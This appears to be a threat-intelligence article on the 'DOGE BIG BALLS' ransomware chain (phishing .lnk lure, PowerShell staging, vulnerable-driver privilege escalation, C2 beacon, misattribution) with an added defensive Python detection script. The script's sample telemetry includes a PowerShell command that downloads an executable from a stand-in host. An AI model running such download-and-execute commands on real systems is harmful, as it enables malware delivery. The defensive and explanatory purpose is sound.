A Complex Cyber Threat Within

Cyble researchers have recently discovered a new ransomware strain known as DOGE BIG BALLS. This ransomware is not only unique in its name but also showcases a high level of technical sophistication, coupled with psychological manipulation tactics.

The DOGE BIG BALLS attack begins with a deceptive ZIP file titled “Pay Adjustment.zip” that is distributed through phishing emails. Inside this ZIP file is a malicious shortcut file named “Pay Adjustment.pdf.lnk” which, when opened, executes PowerShell commands that start a multi-stage infection process. The first stage checks for administrative privileges and downloads a modified version of the Fog ransomware, disguised as “Adobe Acrobat.exe”, into a hidden system directory.

The attackers exploit a critical vulnerability, CVE-2015-2291, in Intel’s Ethernet diagnostics driver (iqvw64e.sys) to gain kernel-level privileges. By leveraging this flaw, the ransomware process can elevate its privileges, disable security logging, and establish persistence within the compromised system.

One of the notable aspects of the DOGE BIG BALLS ransomware is its use of psychological manipulation tactics. The ransomware’s name, “DOGE BIG BALLS,” is a deliberate attempt to associate the attack with Edward Coristine and Elon Musk’s DOGE initiative. By linking the ransomware to Coristine and including his personal details in the ransom note, the attackers aim to misdirect investigations and intimidate victims.

In addition to encryption, the attackers employ reconnaissance and geolocation techniques to gather information about their victims. They use scripts to collect system and network data, which is then transmitted to the attackers via a cloud hosting platform. Furthermore, the attackers query the Wigle.net API to determine the victim’s geographic location.

The post-exploitation phase of the attack involves the use of a Havoc C2 beacon (demon.x64.dll) to maintain communication with the attackers’ command and control infrastructure. This beacon allows the attackers to issue further instructions or exfiltrate additional data from the compromised system.

The involvement of Edward Coristine in the ransom note is a case of misattribution by the attackers. Coristine, who is associated with the DOGE initiative, has no connection to the cybercrime. The attackers strategically use his name to create a false narrative and exploit his public profile for credibility.

To combat DOGE BIG BALLS ransomware attacks, organizations and individuals must adopt proactive defense strategies. This includes enforcing strict execution policies, monitoring PowerShell activity, deploying endpoint detection and response solutions, limiting administrative privileges, and blocking unauthorized outbound connections.
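As an added illustration of the PowerShell and endpoint monitoring recommended above (example code written for this page, not Cyble’s or the article’s tooling), the Python routine below triages constructed telemetry records for three indicators the article names: a double-extension .pdf.lnk lure, PowerShell launched from a user session with a download in its command line, and a load of the vulnerable Intel driver iqvw64e.sys. All paths, the sample URL and the event schema are hypothetical.

```python
import re
from dataclasses import dataclass

# Constructed detection logic keyed to the indicators the article describes.
DOUBLE_EXT_LNK = re.compile(r"\.(pdf|docx?|xlsx?)\.lnk$", re.IGNORECASE)
DOWNLOAD_HINT = re.compile(r"invoke-webrequest|downloadfile|downloadstring|https?://", re.IGNORECASE)
KNOWN_VULN_DRIVERS = {"iqvw64e.sys"}  # CVE-2015-2291 per the article; extend from a BYOVD blocklist

@dataclass
class Event:
    kind: str          # "file", "process" or "driver" (hypothetical schema)
    image: str         # created file, child process image, or driver path
    parent: str = ""   # parent process image (process events only)
    cmdline: str = ""  # child command line (process events only)

def basename(path):
    """Last path component, lower-cased, for either Windows or POSIX separators."""
    return re.split(r"[\\/]", path)[-1].lower()

def classify(ev):
    """Return the list of indicator names a single event matches."""
    hits, name = [], basename(ev.image)
    if ev.kind == "file" and DOUBLE_EXT_LNK.search(name):
        hits.append("double-extension-lnk")
    if (ev.kind == "process" and name in {"powershell.exe", "pwsh.exe"}
            and basename(ev.parent) == "explorer.exe"      # consistent with a double-clicked shortcut
            and DOWNLOAD_HINT.search(ev.cmdline)):
        hits.append("user-launched-powershell-download")
    if ev.kind == "driver" and name in KNOWN_VULN_DRIVERS:
        hits.append("vulnerable-driver-load")
    return hits

def triage(events):
    """(index, hits) for every event that matched at least one indicator."""
    return [(i, h) for i, e in enumerate(events) if (h := classify(e))]

# Constructed sample telemetry; only the lure filename comes from the article.
SAMPLE = [
    Event("file", r"C:\Users\alice\Downloads\Pay Adjustment\Pay Adjustment.pdf.lnk"),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Windows\explorer.exe",
          cmdline="powershell -c Invoke-WebRequest http://example.invalid/x -OutFile a.exe"),
    Event("file", r"C:\Users\alice\Desktop\report.pdf"),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Windows\System32\cmd.exe", cmdline="powershell Get-Date"),
    Event("driver", r"C:\Windows\Temp\iqvw64e.sys"),
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE):
        print(idx, SAMPLE[idx].image, hits)
```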

In conclusion, the DOGE BIG BALLS ransomware presents a significant threat due to its technical sophistication, psychological manipulation tactics, and misdirection strategies. It is imperative for organizations to enhance their cybersecurity measures to protect against such advanced threats.
